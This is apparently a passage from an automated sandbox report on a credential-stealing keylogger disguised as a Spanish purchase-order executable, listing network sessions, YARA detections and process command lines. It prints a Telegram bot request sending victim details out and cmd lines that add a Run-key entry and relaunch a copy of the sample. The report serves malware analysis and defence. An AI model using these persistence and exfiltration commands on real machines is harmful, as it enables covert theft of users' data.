2024-09-12 19:08:02 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49740	188.114.97.3	443	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:04 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:08:04 UTC	703	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:04 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 20 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oY%2BMnCtwkwVM13h%2BbmsHfPXtTHqATMz6To8nRwb0Vzkjp%2FlhGOULyOsdibiUIkriQXFIFVQ37Myy6F8NOZ4SfXtiVECzsPn4sWPMfCwdrZ4zqBmwqg4zkbh3Ngy0udCJLdxmQHJl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f1e08426a58-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:08:04 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49742	188.114.97.3	443	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:05 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-12 19:08:05 UTC	707	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:05 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVnre0hFcEMT6YLvYpwCqLARyyKvnR%2BBEOxLIIzGkaVwmCD%2FEfK4bAg9TeNgq6T0USFYzOObH7QsW8SmAdwtZg%2B%2BF2bQaAnImTChvx8o3VJphEjful8vqLg4tVD42%2BbnuGFFU6fq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f2679eec354-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:08:05 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49744	188.114.97.3	443	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:06 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-12 19:08:06 UTC	715	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:06 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 22 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0aaIvudDFXtmVSqCC%2F%2F%2FBdEid%2BqDEQWvVBO%2FGA7Cqt6xaGn1RU1LcnkC0ueKS9TwVpNvvTsuMXOtC%2BSAKIjaxJiAhcglayrJah5k%2FELJhflMVNi%2Bid2y0VMFFfR5d3ehjp%2Bda44"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f2e8d1f726b-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:08:06 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49746	188.114.97.3	443	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:07 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:08:08 UTC	699	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 24 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IAPHQzovfikumZ5MYkpTnEEuJNoWSYXCeLb3eewnfLTqWEkOPGyC4TiVAeWFDT9Rt3VBUZi7134VJMVxZ4hv8TIBKPXGiBtoq3Ttgmx09H4o5nxXUCRv3plwSrXc6zjBq3%2BxsI7M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f367e8d4228-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:08:08 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49748	188.114.97.3	443	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:09 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:08:09 UTC	709	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:09 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zl%2FNZBb9o%2Bj%2BQ6RFBNH86G6zXUvCe2ZE4u05B84R40BUDOMttvM3xWpPE0gEmik3CbEI5eeR58VFbCqz6ag2%2BIY0e1%2FJrwueBAvczRN%2BILW5beSMIhLSfUCQpafAql4MoTCWLEXh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f3ec81432c7-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:08:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49750	188.114.97.3	443	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:10 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-12 19:08:10 UTC	705	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 26 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCHJGP%2BvhsPQRzeIKZFIuMrgxNzhIJ75XlgjAZEzeUKTvEjZrdlw%2FXvKePVjyss22mnySjyRvv3TBIZS4JHFxT6TFYrOm%2BzhG6eg5kqIzcIYQ5wSP3QGryogHv3AIS%2FWfQieoVdB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f46e8867d02-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:08:10 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.9	49752	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:13 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-12 19:08:13 UTC	699	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yBHQ8NGoMJR9oQocrjg6mtaiJ8gu8p0Gy8EBDQlmvNWaBpi3gOLvIPhfGPJIbIY8sm7wV8O76rqNCu6qqnUu8VPLA7CNc2YxZQ%2F9zQPGdcazHdbGzQbE6V5RfhNqVrzvL21CJsPN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f5689d042d7-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:08:13 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.9	49753	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:13 UTC	345	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2013/09/2024%20/%2003:22:57%0D%0ACountry%20Name:%20United%20States%0D%0A[%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-12 19:08:14 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 12 Sep 2024 19:08:14 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-12 19:08:14 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 12, 2024 21:08:02.757431030 CEST	587	49737	185.230.214.164	192.168.2.9	220 mx.zoho.eu SMTP Server ready September 12, 2024 9:08:02 PM CEST
Sep 12, 2024 21:08:02.757709026 CEST	49737	587	192.168.2.9	185.230.214.164	EHLO 701188
Sep 12, 2024 21:08:03.617580891 CEST	587	49737	185.230.214.164	192.168.2.9	250-mx.zoho.eu Hello 701188 (8.46.123.33 (8.46.123.33)) 250-STARTTLS 250 SIZE 53477376
Sep 12, 2024 21:08:03.617916107 CEST	49737	587	192.168.2.9	185.230.214.164	STARTTLS
Sep 12, 2024 21:08:03.805299997 CEST	587	49737	185.230.214.164	192.168.2.9	220 Ready to start TLS.

Target ID:	0
Start time:	15:06:04
Start date:	12/09/2024
Path:	C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe"
Imagebase:	0x300000
File size:	814'456 bytes
MD5 hash:	FEC61E105CBB213BCDB38AF0DD1EC8BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1532858501.0000000002720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1541699498.0000000004DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1532858501.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:06:12
Start date:	12/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:06:12
Start date:	12/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:06:12
Start date:	12/09/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 18
Imagebase:	0x560000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:06:22
Start date:	12/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c ping 127.0.0.1 -n 24 > nul && copy "C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe" "C:\Users\user\AppData\Roaming\xload.exe" && ping 127.0.0.1 -n 24 > nul && "C:\Users\user\AppData\Roaming\xload.exe"
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:06:22
Start date:	12/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:06:22
Start date:	12/09/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 24
Imagebase:	0x560000
File size:	18'944 bytes
